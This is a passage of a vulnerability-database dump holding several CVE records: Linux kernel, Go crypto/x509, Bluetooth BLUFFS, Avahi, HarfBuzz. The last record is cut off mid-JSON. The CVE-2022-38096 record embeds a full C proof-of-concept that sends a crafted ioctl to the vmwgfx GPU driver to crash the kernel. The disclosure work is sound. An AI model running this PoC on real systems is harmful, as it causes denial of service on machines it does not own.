Severity ?
EPSS score ?
Summary
hci_conn_cleanup in net/bluetooth/hci_conn.c in the Linux kernel through 6.2.9 has a use-after-free (observed in hci_conn_hash_flush) because of calls to hci_dev_put and hci_conn_put. There is a double free that may lead to privilege escalation.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T12:38:25.326Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/lkml/20230309074645.74309-1-wzhmmmmm%40gmail.com/" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2023/03/28/2" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2023/03/28/3" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230517-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "hci_conn_cleanup in net/bluetooth/hci_conn.c in the Linux kernel through 6.2.9 has a use-after-free (observed in hci_conn_hash_flush) because of calls to hci_dev_put and hci_conn_put. There is a double free that may lead to privilege escalation." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-17T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lore.kernel.org/lkml/20230309074645.74309-1-wzhmmmmm%40gmail.com/" }, { "url": "https://www.openwall.com/lists/oss-security/2023/03/28/2" }, { "url": "https://www.openwall.com/lists/oss-security/2023/03/28/3" }, { "url": "https://security.netapp.com/advisory/ntap-20230517-0004/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-28464", "datePublished": "2023-03-31T00:00:00", "dateReserved": "2023-03-15T00:00:00", "dateUpdated": "2024-08-02T12:38:25.326Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-24783
Vulnerability from cvelistv5
Published
2024-03-05 22:22
Modified
2024-11-05 16:57
Severity ?
EPSS score ?
Summary
Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic. This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Go standard library | crypto/x509 |
Version: 0 ≤ Version: 1.22.0-0 ≤ |
|
{ "containers": { "adp": [ { "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2024-24783", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-06T18:26:26.163411Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476 NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-05T16:57:46.952Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T23:28:12.597Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://go.dev/issue/65390" }, { "tags": [ "x_transferred" ], "url": "https://go.dev/cl/569339" }, { "tags": [ "x_transferred" ], "url": "https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg" }, { "tags": [ "x_transferred" ], "url": "https://pkg.go.dev/vuln/GO-2024-2598" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240329-0005/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "crypto/x509", "product": "crypto/x509", "programRoutines": [ { "name": "Certificate.buildChains" }, { "name": "Certificate.Verify" } ], "vendor": "Go standard library", "versions": [ { "lessThan": "1.21.8", "status": "affected", "version": "0", "versionType": "semver" }, { "lessThan": "1.22.1", "status": "affected", "version": "1.22.0-0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "value": "John Howard (Google)" } ], "descriptions": [ { "lang": "en", "value": "Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic. This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates." } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-476: NULL Pointer Dereference", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-05T22:22:26.647Z", "orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "shortName": "Go" }, "references": [ { "url": "https://go.dev/issue/65390" }, { "url": "https://go.dev/cl/569339" }, { "url": "https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg" }, { "url": "https://pkg.go.dev/vuln/GO-2024-2598" }, { "url": "https://security.netapp.com/advisory/ntap-20240329-0005/" }, { "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" } ], "title": "Verify panics on certificates with an unknown public key algorithm in crypto/x509" } }, "cveMetadata": { "assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "assignerShortName": "Go", "cveId": "CVE-2024-24783", "datePublished": "2024-03-05T22:22:26.647Z", "dateReserved": "2024-01-30T16:05:14.757Z", "dateUpdated": "2024-11-05T16:57:46.952Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-24023
Vulnerability from cvelistv5
Published
2023-11-28 00:00
Modified
2024-08-02 10:49
Severity ?
EPSS score ?
Summary
Bluetooth BR/EDR devices with Secure Simple Pairing and Secure Connections pairing in Bluetooth Core Specification 4.2 through 5.4 allow certain man-in-the-middle attacks that force a short key length, and might lead to discovery of the encryption key and live injection, aka BLUFFS.
References
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:bluetooth:bluetooth_core_specification:4.2:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "bluetooth_core_specification", "vendor": "bluetooth", "versions": [ { "lessThanOrEqual": "5.4", "status": "affected", "version": "4.2", "versionType": "custom" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-24023", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-08-01T03:55:58.358030Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-01T13:14:49.093Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T10:49:09.028Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/bluffs-vulnerability/" }, { "tags": [ "x_transferred" ], "url": "https://dl.acm.org/doi/10.1145/3576915.3623066" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Bluetooth BR/EDR devices with Secure Simple Pairing and Secure Connections pairing in Bluetooth Core Specification 4.2 through 5.4 allow certain man-in-the-middle attacks that force a short key length, and might lead to discovery of the encryption key and live injection, aka BLUFFS." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-28T06:55:49.765703", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/bluffs-vulnerability/" }, { "url": "https://dl.acm.org/doi/10.1145/3576915.3623066" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-24023", "datePublished": "2023-11-28T00:00:00", "dateReserved": "2023-01-20T00:00:00", "dateUpdated": "2024-08-02T10:49:09.028Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-38096
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-16 19:46
Severity ?
EPSS score ?
Summary
A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).
References
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "linux_kernel", "vendor": "linux", "versions": [ { "lessThan": "5.14", "status": "affected", "version": "v4.20-rc1", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2022-38096", "options": [ { "Exploitation": "poc" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-06-26T13:45:25.191519Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-26T13:49:29.690Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-03T10:45:52.802Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073" }, { "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "Linux", "versions": [ { "lessThan": "5.13.0-52*", "status": "affected", "version": "v4.20-rc1", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab" } ], "datePublic": "2022-09-06T00:00:00", "descriptions": [ { "lang": "en", "value": "A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)." } ], "exploits": [ { "lang": "en", "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid){ \nint cmd[0x1000]={0};\ncmd[0]=1165;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=sid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context(); \n printf(\"%d\",cid); \n poc(cid); \n \n}" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476 NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-25T21:08:05.642043", "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "shortName": "Anolis" }, "references": [ { "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073" }, { "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html" } ], "source": { "defect": [ "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073" ], "discovery": "INTERNAL" }, "title": "There is a NULL pointer vulnerability in vmwgfx driver", "x_generator": { "engine": "Vulnogram 0.0.9" } } }, "cveMetadata": { "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "assignerShortName": "Anolis", "cveId": "CVE-2022-38096", "datePublished": "2022-09-09T14:39:51.163117Z", "dateReserved": "2022-09-07T00:00:00", "dateUpdated": "2024-09-16T19:46:43.355Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-38473
Vulnerability from cvelistv5
Published
2023-11-02 15:00
Modified
2024-08-29 14:16
Severity ?
EPSS score ?
Summary
A vulnerability was found in Avahi. A reachable assertion exists in the avahi_alternative_host_name() function.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/security/cve/CVE-2023-38473 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2191694 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | n/a | avahi | |||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T17:39:13.627Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-38473" }, { "name": "RHBZ#2191694", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2191694" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-38473", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-29T14:00:14.793605Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-29T14:16:49.059Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "affected", "product": "avahi", "vendor": "n/a" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "avahi", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "avahi", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "avahi", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "avahi", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://packages.fedoraproject.org/", "defaultStatus": "affected", "packageName": "avahi", "product": "Fedora", "vendor": "Fedora" } ], "datePublic": "2023-04-26T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Avahi. A reachable assertion exists in the avahi_alternative_host_name() function." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-617", "description": "Reachable Assertion", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-02T15:00:19.576Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-38473" }, { "name": "RHBZ#2191694", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2191694" } ], "timeline": [ { "lang": "en", "time": "2023-04-26T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-04-26T00:00:00+00:00", "value": "Made public." } ], "title": "Reachable assertion in avahi_alternative_host_name", "x_redhatCweChain": "CWE-617: Reachable Assertion" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-38473", "datePublished": "2023-11-02T15:00:19.576Z", "dateReserved": "2023-07-18T09:48:04.753Z", "dateUpdated": "2024-08-29T14:16:49.059Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-25193
Vulnerability from cvelistv5
Published
2023-02-04 00:00
Modified
2024-08-02 11:18
Severity ?
EPSS score ?
Summary
hb-ot-layout-gsubgpos.hh in HarfBuzz through 6.0.0 allows attackers to trigger O(n^2) growth via consecutive marks during the process of looking back for base glyphs when attaching marks.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T11:18:36.255Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/harfbuzz/harfbuzz/commit/85be877925ddbf34f74a1229f3ca1716bb6170dc" }, { "tags": [ "x_transferred" ], "url": "https://chromium.googlesource.com/chromium/src/+/e1f324aa681af54101c1f2d173d92adb80e37088/DEPS#361" }, { "tags": [ "x_transferred" ], "url": "https://github.com/harfbuzz/harfbuzz/blob/2822b589bc837fae6f66233e2cf2eef0f6ce8470/src/hb-ot-layout-gsubgpos.hh" }, { "name": "FEDORA-2023-4e6353c6f7", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KWCHWSICWVZSAXP2YAXM65JC2GR53547/" }, { "name": "FEDORA-2023-a48406ecd2", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZ5M2GSAIHFPLHYJXUPQ2QDJCLWXUGO3/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230725-0006/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "hb-ot-layout-gsubgpos.hh in HarfBuzz through 6.0.0 allows attackers to trigger O(n^2) growth via consecutive marks during the process of looking back for base glyphs when attaching marks." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-07-25T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/harfbuzz/harfbuzz/commit/85be877925ddbf34f74a1229f3ca1716bb6170dc" }, { "url": "https://chromium.googlesource.com/chromium/src/+/e1f324aa681af54101c1f2d173d92adb80e37088/DEPS#361" }, { "url": "https://github.com/harfbuzz/harfbuzz/blob/2822b589bc837fae6f66233e2cf2eef0f6ce8470/src/hb-ot-layout-gsubgpos.hh" }, { "name": "FEDORA-2023-4e6353c6f7", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KWCHWSICWVZSAXP2YAXM65JC2GR53547/" }, { "name": "FEDORA-2023-a48406ecd2", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZ5M2GSAIHFPLHYJXUPQ2QDJCLWXUGO3/" }, { "url": "https://security.netapp.com/advisory/ntap-20230725-0006/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-25193", "datePublished": "2023-02-04T00:00:00", "dateReserved": "2023-02-04T00:00:00", "dateUpdated": "2024-08-02T11:18:36.255Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3567
Vulnerability from cvelistv5
Published
2023-07-24 15:19
Modified
2024-11-15 16:28
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in vcs_read in drivers/tty/vt/vc_screen.c in vc_screen in the Linux Kernel. This issue may allow an attacker with local user access to cause a system crash or leak internal kernel information.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:0412 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0431 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0432 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0439 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0448 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0575 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2950 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3138 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-3567 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2221463 | issue-tracking, x_refsource_REDHAT | |
https://www.spinics.net/lists/stable-commits/msg285184.html |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-553.rt7.342.el8_10 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:01:56.105Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" }, { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "name": "RHSA-2024:0431", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0431" }, { "name": "RHSA-2024:0432", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0432" }, { "name": "RHSA-2024:0439", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0439" }, { "name": "RHSA-2024:0448", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0448" }, { "name": "RHSA-2024:0575", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0575" }, { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "name": "RHSA-2024:2950", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2950" }, { "name": "RHSA-2024:3138", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3138" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-3567" }, { "name": "RHBZ#2221463", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2221463" }, { "tags": [ "x_transferred" ], "url": "https://www.spinics.net/lists/stable-commits/msg285184.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ 